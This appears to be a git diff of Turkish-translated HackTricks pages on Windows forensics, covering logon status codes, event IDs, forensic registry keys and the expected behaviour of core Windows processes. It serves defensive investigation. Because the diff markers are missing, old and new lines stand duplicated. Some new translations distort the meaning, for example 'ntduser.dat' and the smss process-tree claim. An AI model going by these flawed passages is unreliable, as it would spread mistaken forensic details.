- **0xC0000072**: Hesap devre dışı bırakıldı - Devre dışı bırakılmış hesaplara yetkisiz erişim denemelerini gösterebilir.
- **0xC000006F**: İzin verilen saatler dışında oturum açma - Belirlenen oturum açma saatleri dışında erişim denemelerini gösterebilir, yetkisiz erişimin olası bir işareti olabilir.
- **0xC000006A**: Doğru kullanıcı adı ancak yanlış parola - Olası parola tahmini veya kaba kuvvet saldırısı.
- **0xC0000234**: Kullanıcı hesabı kilitli - Birden fazla başarısız girişim sonucu kilitlenmiş hesapları takip edebilir.
- **0xC0000072**: Hesap devre dışı bırakıldı - Devre dışı bırakılmış hesaplara erişim için izinsiz girişimler.
- **0xC000006F**: İzin verilen saatler dışında oturum açma - Belirlenen oturum açma saatleri dışında erişim girişimleri, izinsiz erişimin olası bir işareti.
- **0xC0000070**: İş istasyonu kısıtlamalarının ihlali - Yetkisiz bir konumdan oturum açma girişimi olabilir.
- **0xC0000193**: Hesap süresinin dolması - Süresi dolmuş kullanıcı hesaplarıyla erişim denemelerini gösterebilir.
- **0xC0000071**: Süresi dolmuş şifre - Güncel olmayan şifrelerle oturum açma denemelerini gösterebilir.
- **0xC0000133**: Zaman senkronizasyon sorunları - İstemci ve sunucu arasındaki büyük zaman farkları, pass-the-ticket gibi daha sofistike saldırıların işareti olabilir.
- **0xC0000224**: Zorunlu şifre değişikliği gereklidir - Sık zorunlu değişiklikler, hesap güvenliğini bozmaya yönelik bir girişimi gösterebilir.
- **0xC0000225**: Bir güvenlik sorunu yerine bir sistem hatasını gösterir.
- **0xC000015b**: Reddedilen oturum açma türü - Yetkisiz oturum açma türü ile erişim denemesini gösterebilir, örneğin bir kullanıcının bir hizmet oturumu açmaya çalışması.
- **0xC0000193**: Hesap süresi doldu - Süresi dolmuş kullanıcı hesapları ile erişim girişimleri.
- **0xC0000071**: Süresi dolmuş parola - Güncelliğini yitirmiş parolalarla oturum açma girişimleri.
- **0xC0000133**: Zaman senkronizasyon sorunları - İstemci ve sunucu arasındaki büyük zaman farkları, bilet aktarma gibi daha sofistike saldırıların işareti olabilir.
- **0xC0000224**: Zorunlu parola değişikliği gereklidir - Sık zorunlu değişiklikler, hesap güvenliğini bozmaya yönelik bir girişimi gösterebilir.
- **0xC0000225**: Bir güvenlik sorunu yerine bir sistem hatasını belirtir.
- **0xC000015b**: Reddedilen oturum açma türü - Yetkisiz oturum açma türü ile erişim girişimi, bir kullanıcının bir hizmet oturumu açmaya çalışması gibi.
#### Olay Kimliği 4616:
- **Zaman Değişikliği**: Sistem zamanının değiştirilmesi, olay zaman çizgisini karıştırabilir.
#### Olay Kimliği 6005 ve 6006:
- **Sistem Başlatma ve Kapatma**: Olay Kimliği 6005 sistem başlatıldığını, Olay Kimliği 6006 ise kapatıldığını belirtir.
- **Sistem Başlatma ve Kapatma**: Olay Kimliği 6005, sistemin başlatıldığını, Olay Kimliği 6006 ise kapatıldığını belirtir.
#### Olay Kimliği 1102:
- **Günlük Silme**: Güvenlik günlüklerinin temizlenmesi, genellikle yasadışı faaliyetleri örtbas etmek için bir işaret olabilir.
@ -472,7 +470,7 @@ Erişim olayları, `C:\Windows\System32\winevt\Security.evtx` konumundaki güven
Bu giriş türlerini ve kimlik bilgilerini nerede bulabileceğiniz ve kimlik bilgilerini nerede bulabileceğiniz gibi pratik örnekler için [Altered Security'nin detaylı kılavuzuna](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them) başvurun.
Olay ayrıntıları, durum ve alt durum kodları da dahil olmak üzere olay nedenleri hakkında daha fazla bilgi sağlar, özellikle Olay Kimliği 4625'te dikkate değerdir.
Olay ayrıntıları, durum ve alt durum kodları, özellikle Olay Kimliği 4625'te daha fazla olay nedeni hakkında daha fazla bilgi sağlar.
### Windows Olaylarını Kurtarma
@ -484,38 +482,23 @@ Ortak siber saldırıları tanımlamak için Windows Olay Kimliklerini kullanma
#### Kaba Kuvvet Saldırıları
Birden fazla Olay Kimliği 4625 kaydıyla tanımlanabilir, saldırı başarılı olursa bir Olay Kimliği 4624 ile devam eder.
Birden fazla Olay Kimliği 4625 kaydıyla tanımlanabilir, saldırı başarılı olursa bir Olay Kimliği 4624 izler.
#### Zaman Değişikliği
Olay Kimliği 4616 tarafından kaydedilen sistem zamanı değişiklikleri, adli analizi karmaşık hale getirebilir.
Sistem zamanındaki değişiklikler, Olay Kimliği 4616 tarafından kaydedilir ve bu durum, adli analizi karmaşık hale getirebilir.
#### USB Cihaz Takibi
USB cihaz takibi için kullanışlı Sistem Olay Kimlikleri, başlangıçta kullanım için 20001/20003/10000, sürücü güncellemeleri için 10100 ve takma zamanları için DeviceSetupManager'dan Olay Kimliği 112'yi içerir.
USB cihaz takibi için kullanışlı Sistem Olay Kimlikleri, başlangıç için 20001/20003/10000, sürücü güncellemeleri için 10100 ve cihaz takma zamanları için DeviceSetupManager'dan Olay Kimliği 112'yi içerir.
#### Sistem Güç Olayları
EventID 6005, sistem başlangıcını gösterirken, EventID 6006 kapanışı işaretler.
#### Günlük Silme
Güvenlik EventID 1102, günlüklerin silinmesini işaret eder, bu da adli analiz için kritik bir olaydır.
Güvenlik EventID 1102, günlüklerin silinmesini işaret eder, adli bilişim analizi için kritik bir olay.
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
<details>
<summary><strong>Sıfırdan kahraman olacak şekilde AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi **HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** istiyorsanız [**ABONELİK PLANLARI**]'na(https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>

View file

@ -2,23 +2,23 @@
### İlginç Windows Kayıt Defteri Anahtarları
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı) ile sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!</strong></a></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'i keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR gönderin.
</details>
{% endhint %}
### **Windows Sürümü ve Sahip Bilgisi**
- **`Software\Microsoft\Windows NT\CurrentVersion`** konumunda, Windows sürümünü, Hizmet Paketi'ni, kurulum zamanını ve kayıtlı sahibin adınıık bir şekilde bulabilirsiniz.
### **Windows Sürümü ve Sahip Bilgileri**
- **`Software\Microsoft\Windows NT\CurrentVersion`** altında, Windows sürümü, Service Pack, kurulum zamanı ve kayıtlı sahibin adınıık bir şekilde bulabilirsiniz.
### **Bilgisayar Adı**
- Ana bilgisayar adı **`System\ControlSet001\Control\ComputerName\ComputerName`** altında bulunur.
@ -27,48 +27,48 @@ HackTricks'ı desteklemenin diğer yolları:
- Sistemin zaman dilimi **`System\ControlSet001\Control\TimeZoneInformation`** içinde saklanır.
### **Erişim Zamanı Takibi**
- Varsayılan olarak, son erişim zamanı takibi kapalıdır (**`NtfsDisableLastAccessUpdate=1`**). Etkinleştirmek için şunu kullanın:
- Varsayılan olarak, son erişim zamanı takibi kapatılmıştır (**`NtfsDisableLastAccessUpdate=1`**). Etkinleştirmek için şunu kullanın:
`fsutil behavior set disablelastaccess 0`
### Windows Sürümleri ve Hizmet Paketleri
- **Windows sürümü**, sürümü (örneğin, Home, Pro) ve yayınını (örneğin, Windows 10, Windows 11) gösterirken, **Hizmet Paketleri** düzeltmeleri ve bazen yeni özellikleri içeren güncellemelerdir.
### Windows Sürümleri ve Service Pack'ler
- **Windows sürümü**, sürümü (örneğin, Ev, Pro) ve çıkışı (örneğin, Windows 10, Windows 11) belirtirken, **Service Pack'ler** düzeltmeleri ve bazen yeni özellikleri içeren güncellemelerdir.
### Son Erişim Zamanını Etkinleştirme
- Son erişim zamanı takibini etkinleştirmek, dosyaların ne zaman ıldığını görebilmenizi sağlar ve adli analiz veya sistem izleme için önemli olabilir.
- Son erişim zamanı takibini etkinleştirmek, dosyaların ne zaman en son açıldığını görmeyi sağlar; bu, adli analiz veya sistem izleme için önemli olabilir.
### Ağ Bilgisi Detayları
- Kayıt defteri, ağ yapılandırmaları hakkında kapsamlı verileri içerir, bunlar arasında **ağ türleri (kablosuz, kablo, 3G)** ve **ağ kategorileri (Genel, Özel/Ev, Alan/Çalışma)** bulunur, bu da ağ güvenlik ayarlarını ve izinleri anlamak için önemlidir.
- Kayıt defteri, ağ yapılandırmaları hakkında kapsamlı veriler içerir, **ağ türleri (kablosuz, kablo, 3G)** ve **ağ kategorileri (Genel, Özel/Ev, Etki Alanı/İş)** gibi, ağ güvenlik ayarlarını ve izinleri anlamak için hayati önem taşır.
### İstemci Tarafı Önbelleği (CSC)
- **CSC**, paylaşılan dosyaların önbelleğe alınmış kopyalarıyla çevrimdışı dosya erişimini geliştirir. Farklı **CSCFlags** ayarları, önbelleğe alınan dosyaların nasıl ve hangi dosyaların önbelleğe alındığını kontrol eder, özellikle kesintili bağlantıya sahip ortamlarda performansı ve kullanıcı deneyimini etkiler.
- **CSC**, paylaşılan dosyaların kopyalarını önbelleğe alarak çevrimdışı dosya erişimini geliştirir. Farklı **CSCFlags** ayarları, hangi dosyaların ve nasıl önbelleğe alındığını kontrol eder, özellikle kesintili bağlantıların olduğu ortamlarda performansı ve kullanıcı deneyimini etkiler.
### Otomatik Başlatılan Programlar
- Çeşitli `Run` ve `RunOnce` kayıt defteri anahtarlarında listelenen programlar otomatik olarak başlatılır, sistem başlatma süresini etkiler ve kötü amaçlı yazılım veya istenmeyen yazılım tespiti için ilgi noktaları olabilir.
### Otomatik Başlangıç Programları
- Başlangıçta otomatik olarak başlatılan programlar, sistem başlatma süresini etkiler ve kötü amaçlı yazılımları veya istenmeyen yazılımları tanımlamak için ilgi noktaları olabilir, çeşitli `Run` ve `RunOnce` kayıt defteri anahtarlarında listelenirler.
### Shellbags
- **Shellbags**, sadece klasör görünümleri için tercihleri depolamakla kalmaz, aynı zamanda klasör artık mevcut olmasa bile klasör erişimiyle ilgili adli kanıtlar sağlar. Diğer yöntemlerle açıkça görülmeyen kullanıcı etkinliğini ortaya çıkarmak için değerlidir.
- **Shellbags**, sadece klasör görünümleri için tercihleri depolamakla kalmaz, aynı zamanda klasörün artık mevcut olmasa bile erişildiğine dair adli kanıtlar sağlar. Diğer yöntemlerle açık olmayan kullanıcı etkinliğini ortaya çıkarmak için değerlidir.
### USB Bilgisi ve Adli İnceleme
- Kayıt defterinde USB cihazları hakkında depolanan ayrıntılar, bir bilgisayara bağlanan cihazları izlemeye yardımcı olabilir, bu da bir cihazı hassas dosya transferleri veya izinsiz erişim olaylarıyla ilişkilendirebilir.
### USB Bilgisi ve Adli Bilişim
- USB cihazları hakkında kayıt defterinde saklanan ayrıntılar, bir bilgisayara bağlanan hangi cihazların izini sürmeye yardımcı olabilir, potansiyel olarak bir cihazı hassas dosya transferleri veya izinsiz erişim olaylarıyla ilişkilendirebilir.
### Birim Seri Numarası
- **Birim Seri Numarası**, farklı cihazlar arasında dosya kaynağının belirlenmesi gereken adli senaryolarda önemli olabilir.
### Hacim Seri Numarası
- **Hacim Seri Numarası**, dosya sisteminin belirli bir örneğini izlemek için kritik olabilir, dosya kaynağının farklı cihazlar arasında belirlenmesi gereken adli senaryolarda faydalıdır.
### **Kapanış Ayrıntıları**
- Kapanış zamanı ve sayısı (yalnızca XP için) **`System\ControlSet001\Control\Windows`** ve **`System\ControlSet001\Control\Watchdog\Display`** içinde tutulur.
### **Kapanma Ayrıntıları**
- Kapanma zamanı ve sayısı (yalnızca XP için) **`System\ControlSet001\Control\Windows`** ve **`System\ControlSet001\Control\Watchdog\Display`** içinde saklanır.
### **Ağ Yapılandırması**
- Ayrıntılı ağ arayüzü bilgileri için **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**'e bakın.
- İlk ve son ağ bağlantı zamanları, VPN bağlantıları dahil olmak üzere, **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`** altındaki çeşitli yollarda kaydedilir.
- İlk ve son ağ bağlantı zamanları, VPN bağlantıları da dahil olmak üzere, **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`** içinde çeşitli yollarda kaydedilir.
### **Paylaşılan Klasörler**
- Paylaşılan klasörler ve ayarlar **`System\ControlSet001\Services\lanmanserver\Shares`** altında bulunur. İstemci Tarafı Önbelleği (CSC) ayarları çevrimdışı dosya kullanılabilirliğini belirler.
- Paylaşılan klasörler ve ayarlar **`System\ControlSet001\Services\lanmanserver\Shares`** altında bulunur. İstemci Tarafı Önbelleği (CSC) ayarları çevrimdışı dosya erişilebilirliğini belirler.
### **Otomatik Olarak Başlayan Programlar**
- **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** gibi yollar ve `Software\Microsoft\Windows\CurrentVersion` altındaki benzer girişler, başlangıçta çalışacak programları detaylandırır.
### **Otomatik Başlayan Programlar**
- **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** gibi yollar ve başlangıçta çalışacak programları ayrıntılandıran `Software\Microsoft\Windows\CurrentVersion` altındaki benzer girişler.
### **Aramalar ve Yazılan Yollar**
- Gezgin aramaları ve yazılan yollar, WordwheelQuery ve TypedPaths için sırasıyla **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** altında kaydedilir.
- Araştırıcı aramaları ve yazılan yollar, WordwheelQuery ve TypedPaths için sırasıyla **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** altında kaydedilir.
### **Son Belgeler ve Office Dosyaları**
- Erişilen son belgeler ve Office dosyaları, `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` ve belirli Office sürümü yollarında belirtilir.
@ -76,8 +76,15 @@ HackTricks'ı desteklemenin diğer yolları:
### **En Son Kullanılan (MRU) Öğeler**
- En son kullanılan dosya yollarını ve komutları gösteren MRU listeleri, `NTUSER.DAT` altındaki çeşitli `ComDlg32` ve `Explorer` alt anahtarlarında saklanır.
### **Kullanıcı Etkinliği Takibi**
- Kullanıcı Yardımı özelliği, uygulama kullanım istatistiklerini ayrıntılı olarak kaydeder, bu istatistikler arasında çalıştırma sayısı ve son çalıştırma zamanı bulunur ve **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`** altında kaydedilir.
### **Kullanıcı Etkinlik Takibi**
- Kullanıcı Yardımı özelliği, ayrıntılı uygulama kullanım istatistiklerini, çalıştırma sayısını ve son çalıştırma zamanını **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`** altında kaydeder.
### **Shellbags Analizi**
- Klasör erişim ayrıntılarını ortaya çıkaran Shellbags, `USRCLASS.DAT` ve `NTUSER.DAT` altında `Software\Microsoft\Windows\Shell` içinde saklanır.
- Klasör erişim ayrıntılarını ortaya çıkaran Shellbags, analiz için `USRCLASS.DAT` ve `NTUSER.DAT` altında `Software\Microsoft\Windows\Shell` içinde saklanır. Analiz için **[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)** kullanın.
### **USB Cihaz Geçmişi**
- **`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`** ve **`HKLM\SYSTEM\ControlSet001\Enum\USB`** bağlı USB cihazları hakkında zengin ayrıntılar içerir, üretici, ürün adı ve bağlantı zaman damgaları gibi.
- Belirli bir USB cihazıyla ilişkilendirilen kullanıcı, cihazın **{GUID}**'sini arayarak `NTUSER.DAT` hive'larında belirlenebilir.
- Son bağlanan cihaz ve hacim seri numarası, sırasıyla `System\MountedDevices` ve `Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt` içinde izlenebilir.
Bu kılavuz, Windows sistemlerinde detaylı sistem, ağ ve kullanıcı etkinlik bilgilerine erişmek için önemli yolları ve yöntemleri özlü ve kullanışlı bir şekilde özetler.

View file

@ -1,54 +1,55 @@
{% hint style="success" %}
Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmak için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>ile öğrenin!</strong></summary>
<summary>HackTricks'i Destekle</summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'i **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip et.**
* **Hacking püf noktalarını göndererek HackTricks ve HackTricks Cloud** github depolarına PR gönder.
</details>
{% endhint %}
## smss.exe
**Oturum Yöneticisi**.\
Oturum 0, **csrss.exe** ve **wininit.exe** (**İşletim Sistemi** **hizmetleri**)'yi başlatırken, Oturum 1, **csrss.exe** ve **winlogon.exe** (**Kullanıcı** **oturumu**)'yu başlatır. Bununla birlikte, işlem ağacında **yalnızca bir tane** bu **ikili**nin çocuksuz bir işlemi olduğunu görmelisiniz.
Oturum 0, **csrss.exe** ve **wininit.exe** (**İşletim Sistemi hizmetleri**) başlatırken Oturum 1, **csrss.exe** ve **winlogon.exe** (**Kullanıcı oturumu**) başlatır. Ancak, bu **binary**'nin **çocuksuz** bir **süreç ağacında** görünmesi gerekmektedir.
Ayrıca, 0 ve 1'den farklı oturumlar, RDP oturumlarının gerçekleştiği anlamına gelebilir.
## csrss.exe
**İstemci/Sunucu Çalışma Alt Sistemi İşlemi**.\
**İşlemleri** ve **iş parçacıklarını** yönetir, diğer işlemler için **Windows** **API**'yi kullanılabilir hale getirir ve ayrıca **sürücü harflerini eşler**, **geçici dosyalar** oluşturur ve **kapanma işlemini** yönetir.
**İstemci/Sunucu Çalışma Alt Sistemi Süreci**.\
**Süreçleri** ve **iş parçacıklarını** yönetir, **Windows API**'yi diğer süreçler için kullanılabilir hale getirir ve ayrıca **sürücü harflerini eşler**, **geçici dosyalar oluşturur** ve **kapatma işlemini** yönetir.
Oturum 0'da bir tane **çalışırken, Oturum 1'de bir tane daha** vardır (bu nedenle işlem ağacında **2 işlem** bulunur). Yeni bir Oturum başına başka bir tane oluşturulur.
Oturum 0'da bir tane **çalışırken ve Oturum 1'de bir tane** olmak üzere (bu nedenle süreç ağacında **2 süreç** bulunmaktadır). Yeni bir Oturum başına başka bir tane oluşturulur.
## winlogon.exe
**Windows Oturum Açma İşlemi**.\
Kullanıcı **oturum açma**/**oturum kapatma** işlemlerinden sorumludur. Kullanıcı adı ve parola sormak için **logonui.exe**'yi başlatır ve ardından bunları doğrulamak için **lsass.exe**'yi çağırır.
**Windows Oturum Açma Süreci**.\
Kullanıcı **oturum açma**/**oturum kapatma** işlemlerinden sorumludur. Kullanıcı adı ve şifre istemek için **logonui.exe**'yi başlatır ve ardından bunları doğrulamak için **lsass.exe**'yi çağırır.
Ardından, **`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`**'da **Userinit** anahtarıyla belirtilen **userinit.exe**'yi başlatır.
Daha sonra, **`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`**'da belirtilen **Userinit** anahtarıyla **userinit.exe**'yi başlatır.
Ayrıca, önceki kayıt defterinde **Shell anahtarında explorer.exe** olmalı veya kötü amaçlı yazılım kalıcılık yöntemi olarak istismar edilebilir.
Ayrıca, önceki kayıt defterinde **Shell anahtarında explorer.exe**'nin olması gerekmektedir veya bu, **kötü amaçlı yazılım kalıcılık yöntemi** olarak kötüye kullanılabilir.
## wininit.exe
**Windows Başlatma İşlemi**. \
Oturum 0'da **services.exe**, **lsass.exe** ve **lsm.exe**'yi başlatır. Yalnızca 1 işlem olmalıdır.
**Windows Başlatma Süreci**. \
Oturum 0'da **services.exe**, **lsass.exe** ve **lsm.exe**'yi başlatır. Yalnızca 1 süreç olmalıdır.
## userinit.exe
**Userinit Oturum Açma Uygulaması**.\
**ntuser.dat'ı HKCU'da** yükler ve **kullanıcı** **ortamını** başlatır, **oturum açma** **betiklerini** ve **GPO'ları** çalıştırır.
**Kullanıcı Oturum Açma Uygulaması**.\
**HKCU'da ntduser.dat**'ı yükler ve **kullanıcı ortamını başlatır** ve **oturum açma betiklerini** ve **GPO'ları** çalıştırır.
**explorer.exe**'yi başlatır.
@ -56,62 +57,87 @@ Oturum 0'da **services.exe**, **lsass.exe** ve **lsm.exe**'yi başlatır. Yalnı
## lsm.exe
**Yerel Oturum Yöneticisi**.\
smss.exe ile birlikte kullanıcı oturumlarını manipüle etmek için çalışır: Oturum açma/oturum kapatma, kabuk başlatma, masaüstünü kilitleme/açma vb.
Kullanıcı oturumlarını yönetmek için smss.exe ile çalışır: Oturum açma/kapatma, kabuk başlatma, masaüstünü kilitleme/açma vb.
W7'den sonra lsm.exe bir hizmete (lsm.dll) dönüştürüldü.
W7'de yalnızca 1 işlem olmalı ve bunlardan biri DLL çalıştıran bir hizmeti çalıştıran bir hizmet olmalıdır.
W7'de yalnızca 1 süreç olmalıdır ve bunlardan biri DLL çalıştıran bir hizmettir.
## services.exe
**Hizmet Denetim Yöneticisi**.\
**Otomatik başlatılan hizmetleri** ve **sürücüleri** yükler.
**Hizmet Kontrol Yöneticisi**.\
**Otomatik başlangıç** ve **sürücüler** olarak yapılandırılmış **hizmetleri yükler**.
**svchost.exe**, **dllhost.exe**, **taskhost.exe**, **spoolsv.exe** ve daha birçok işlemin ana işlemidir.
**svchost.exe**, **dllhost.exe**, **taskhost.exe**, **spoolsv.exe** ve daha birçok sürecin ana sürecidir.
Hizmetler `HKLM\SYSTEM\CurrentControlSet\Services` içinde tanımlanır ve bu işlem, sc.exe tarafından sorgulanabilen hizmet bilgilerinin bellekteki bir veritabanını korur.
Hizmetler, `HKLM\SYSTEM\CurrentControlSet\Services` içinde tanımlanmıştır ve bu süreç, hizmet bilgilerinin bellekteki bir veritabanını sorgulayabileceği bir DB'yi korur.
Dikkat edin, **bazı** **hizmetler** kendi **işlemlerinde çalışacak** ve diğerleri **svchost.exe işlemiyle paylaşacak**.
**Bazı hizmetlerin kendi süreçlerinde** çalışacağına **dikkat edin** ve diğerlerinin **svchost.exe sürecini paylaşacağına dikkat edin**.
Yalnızca 1 işlem olmalıdır.
Yalnızca 1 süreç olmalıdır.
## lsass.exe
**Yerel Güvenlik Yetkilendirme Alt Sistemi**.\
Kullanıcı **kimlik doğrulama**sından ve **güvenlik** **jetonlarının** oluşturulmasından sorumludur. Kimlik doğrulama paketleri `HKLM\System\CurrentControlSet\Control\Lsa` konumunda bulunur.
**Yerel Güvenlik Otoritesi Alt Sistemi**.\
Kullanıcı **kimlik doğrulamasından sorumludur** ve **güvenlik** **jetonları** oluşturur. `HKLM\System\CurrentControlSet\Control\Lsa` konumunda bulunan kimlik doğrulama paketlerini kullanır.
**Güvenlik** **etkinlik** **günlüğüne** yazılır ve yalnızca 1 işlem olmalıdır.
**Güvenlik** **etkinlik** **günlüğüne yazılır** ve yalnızca 1 süreç olmalıdır.
Bu işlemin parolaları çalmak için yoğun bir şekilde saldırıya uğradığını unutmayın.
Bu sürecin şifreleri çalmak için yoğun bir şekilde saldırıya uğradığını unutmayın.
## svchost.exe
**Genel Hizmet Ana İşlemi**.\
Birleşik bir işlemde birden çok DLL hizmetini barındırır.
**Genel Hizmet Ana Bilgisayar Süreci**.\
Birden fazla DLL hizmetini tek bir paylaşılan süreçte barındırır.
Genellikle **svchost.exe**'nin `-k` bayrağıyla başlatıldığını göreceksiniz. Bu, aynı işlemde başlatılacak hizmetleri içeren `-k` ile belirtilen bir anahtarın bulunacağı **HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost** kaydına bir sorgu başlatacaktır.
Genellikle **svchost.exe**'nin **-k** bayrağıyla başlatıldığını göreceksiniz. Bu, aynı süreçte başlatılacak hizmetleri içeren **HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost** kaydına bir argümanla bir sorgu başlatacaktır.
Örneğin: `-k UnistackSvcGroup` şunları başlatacaktır: `PimIndexMaintenanceSvc MessagingService WpnUserService CDPUserSvc UnistoreSvc UserDataSvc OneSyncSvc`
**-s** bayrağı da bir argümanla birlikte kullanılıyorsa, svchost'un yalnızca bu argümandaki belirtilen hizmeti başlatması istenir.
**-s bayrağı** belirli bir hizmeti başlatması isteniyorsa, svchost'a yalnızca bu argümanla belirtilen hizmeti başlatması istenir.
Birkaç `svchost.exe` işlemi olacaktır. Bunlardan herhangi biri **`-k` bayrağı kullanmıyorsa**, bu çok şüphelidir. **services.exe'nin ebeveyn olmadığını** bulursanız, bu da çok şüphelidir.
`svchost.exe`'nin birkaç süreci olacaktır. Bunlardan herhangi biri **-k** bayrağı kullanmıyorsa, bu çok şüphelidir. **services.exe'nin ebeveyn olmadığını** bulursanız, bu da çok şüphelidir.
## taskhost.exe
Bu işlem, DLL'lerden çalışan işlemler için bir ana bilgisayar görevi görür. Ayrıca DLL'lerden çalışan hizmetleri yükler.
Bu süreç, DLL'lerden çalışan süreçler için bir ana bilgisayar olarak hareket eder. Ayrıca DLL'lerden çalışan hizmetleri yükler.
W8'de bu taskhostex.exe olarak adlandırılır ve W10'da taskhostw.exe olarak adlandırılır.
## explorer.exe
Bu, kullanıcının masaüstünden sorumlu olan işlemdir ve dosya uzantıları aracılığıyla dosyaları başlatır.
Bu, **kullanıcının masaüstünden** sorumlu süreçtir ve dosyaları dosya uzantıları aracılığıyla başlatır.
**Giriş yapan her kullanıcı başına yalnızca 1** işlem oluşturulmalıdır.
